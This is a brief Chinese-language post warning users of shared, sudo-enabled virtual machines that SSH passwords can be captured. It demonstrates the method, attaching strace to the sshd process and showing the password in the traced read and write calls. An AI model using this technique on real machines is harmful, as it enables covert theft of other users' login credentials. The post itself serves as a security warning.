在工作中都用到virtual machine吧，同事之間還互相借用機器，或者不借用但憑借自己的域賬號能登錄任意機器，而且每個域賬號都有sudo權限？

那你要小心了！

因為我可以輕易記錄下每個ssh登錄到我機器，或者我在別人的機器上放一個簡單的命令，從而記錄下登錄者的密碼。

讓我們做一個很簡單的試驗：

# ps -ef|grep sshd
root         847       1  0 Oct27 ?        00:00:00 sshd: /usr/sbin/sshd -D # sshd是OpenSSH daemon
# strace -f -p 847
strace: Process 847 attached# 另外開一個終端，用ssh登錄，在上面那個終端里將會看到第二個終端里的登錄密碼，如下
pselect6(9, [3 4], NULL, NULL, NULL, {sigmask=[], sigsetsize=8}
) = 1 (in [3])
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
...
[pid 3041295] write(5, "\0\0\0\17\f", 5) = 5
[pid 3041293] <... poll resumed>)       = 1 ([{fd=6, revents=POLLIN}])
[pid 3041295] write(5, "\0\0\0\n這里有密碼", 14 <unfinished ...>
[pid 3041293] getpid( <unfinished ...>
[pid 3041295] <... write resumed>)      = 14
[pid 3041293] <... getpid resumed>)     = 3041293
[pid 3041295] getpid( <unfinished ...>
[pid 3041293] read(6,  <unfinished ...>
[pid 3041295] <... getpid resumed>)     = 3041295
[pid 3041293] <... read resumed>"\0\0\0\17", 4) = 4
[pid 3041295] getpid( <unfinished ...>
[pid 3041293] read(6,  <unfinished ...>
[pid 3041295] <... getpid resumed>)     = 3041295
[pid 3041293] <... read resumed>"\f\0\0\0\n這里有密碼", 15) = 15

你看你的密碼都被別人記錄下來嘍。

寫一個過濾程序，放在后臺執行？有點可怕。